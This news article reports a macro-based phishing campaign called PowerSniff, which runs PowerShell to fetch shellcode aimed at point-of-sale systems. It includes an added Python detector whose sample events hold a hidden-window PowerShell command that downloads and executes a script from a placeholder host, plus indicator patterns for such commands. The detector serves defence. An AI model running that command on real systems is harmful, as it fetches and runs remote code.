The return of the Microsoft Word macro virus with malicious documents that execute PowerShell scripts

Back to the nineties with spear-phishing attacks using Word macros

Threat researchers at Palo Alto Networks have warned of a malware campaign that uses malicious Microsoft Word macros to execute PowerShell scripts in an attack that they have dubbed "PowerSniff".

The attack is propagated via phishing emails, prompting recipients to open the attached Word document. If they have not enabled macros in Microsoft Office, they are prompted to do so in order for the attack to proceed.

It then silently launches powershell.exe, determines whether the user is running 32- or 64-bit Windows, and downloads a PowerShell script containing shellcode. The shellcode is then decrypted and the malware payload executed.
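The process chain described above (a Word document whose macro launches powershell.exe, which then fetches a script) is also the most useful detection hook for defenders. The following is an added example, not code from the article or from Palo Alto Networks: it scans process-creation events for a PowerShell host whose parent is an Office application and flags generic command-line indicators. The event field names are modelled on Sysmon Event ID 1 (Image, ParentImage, CommandLine), the sample events and paths are constructed for this example, and the indicator patterns are generic heuristics, not indicators specific to the PowerSniff campaign.

```python
import re

# Constructed sample process-creation events (Sysmon-style field names; all values invented).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": r"powershell.exe -NoP -W Hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload.ps1')"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe Get-Process"},
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "CommandLine": r"powershell.exe -enc SQBFAFgA"},
]

# Office hosts that should essentially never spawn a shell on a well-managed workstation.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}

# Generic command-line heuristics (assumed, not campaign-specific): each is a
# (label, pattern) pair matched case-insensitively against the command line.
INDICATORS = [
    ("hidden-window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("no-profile", re.compile(r"-nop(rofile)?\b", re.I)),
    ("encoded-command", re.compile(r"-e(nc|ncodedcommand)?\s+\S", re.I)),
    ("remote-download", re.compile(r"downloadstring|downloadfile|invoke-webrequest|iwr\b|invoke-expression|\biex\b", re.I)),
]


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return an alert dict if the event is an Office application spawning PowerShell, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if child not in SHELLS or parent not in OFFICE_IMAGES:
        return None
    cmd = event.get("CommandLine", "")
    indicators = [label for label, pattern in INDICATORS if pattern.search(cmd)]
    # A SysWOW64 path means the 32-bit PowerShell host was chosen on 64-bit Windows,
    # which is worth recording given the article's note that the macro checks the OS bitness.
    arch = "32-bit host" if "syswow64" in event.get("Image", "").lower() else "native host"
    return {
        "parent": parent,
        "child": child,
        "arch": arch,
        "indicators": indicators,
        # The parent/child pair alone is suspicious; command-line indicators raise the severity.
        "severity": "high" if indicators else "medium",
    }


def scan(events):
    """Run classify() over a sequence of events and collect the alerts."""
    return [hit for hit in (classify(ev) for ev in events) if hit]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Of the four constructed events, only the two Office-to-PowerShell launches produce alerts; a user running PowerShell from cmd.exe does not. In practice the parent/child pair is the robust signal, since command-line flags can be rearranged or omitted by an attacker, so the severity split above is a triage aid rather than a filter.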

According to independent expert David Bisson, writing for Graham Cluley's security website, the malware appears to be targeting point-of-sale systems - while actively avoiding schools and school children.

"At this point in time, the malware performs a series of actions to gather more information about the machine on which it is running. For instance, it scans for usernames like 'MALWARE' and 'VIRUS' as well as a number of libraries to determine whether it is running in a virtualized environment or sandbox. This is clearly an attempt to avoid analysis by anti-virus researchers," wrote Bisson in an analysis.

He continued: "PowerSniff also checks for the absence of the strings 'TEACHER', 'STUDENT', 'SCHOOLBOARD', 'PEDIATRICS', and 'ORTHOPED', but actively looks for the presence of 'POS', 'STORE', 'SHOP', and 'SALE'."

According to Josh Grunzweig and Brandon Levene at Palo Alto Networks, who uncovered the attack, the virus has so far been limited to spear-phishing attacks - targeted attacks involving about 1,500 emails.

"The majority of these emails contain specific information about the victim's company, such as their phone number, physical address, as well as the name of the individual. This additional information is not typically included in widespread spam campaigns, and can often provide a sense of trust when seen by the victim, which in turn may lead to a higher number of opened attachments," claim Grunzweig and Levene.

Information gleaned from the attacks is relayed back to command and control servers.

The use of Word macros as the foundation for the attack has echoes of the Word macro viruses that proliferated during the 1990s, culminating in the well-known Melissa virus or worm of 1999.

When a user opened a Word document containing Melissa, it infected their machine and replicated by sending a similarly infected email to the first 50 people in their address book. Melissa forced Microsoft to take security far more seriously. David L. Smith of New Jersey was identified as the virus's author, with the Microsoft Word globally unique identifier pointing the finger in his direction.

He pleaded guilty in court and was sentenced to ten years in prison, and fined $5,000. However, he served just 20 months in prison.
